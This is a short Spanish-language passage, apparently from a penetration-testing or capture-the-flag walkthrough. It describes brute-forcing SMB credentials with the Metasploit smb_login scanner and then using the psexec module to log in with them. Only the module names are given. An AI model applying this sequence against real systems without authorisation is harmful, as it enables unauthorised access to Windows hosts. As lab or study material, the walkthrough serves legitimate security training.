Utilizamos un ataque de fuerza bruta contra el protocolo smb y obtenemos las credenciales:

use auxiliary/scanner/smb/smb_login

Podemos usar el módulo de psexec para iniciar sesión con dichas credenciales:

use exploit/windows/smb/psexec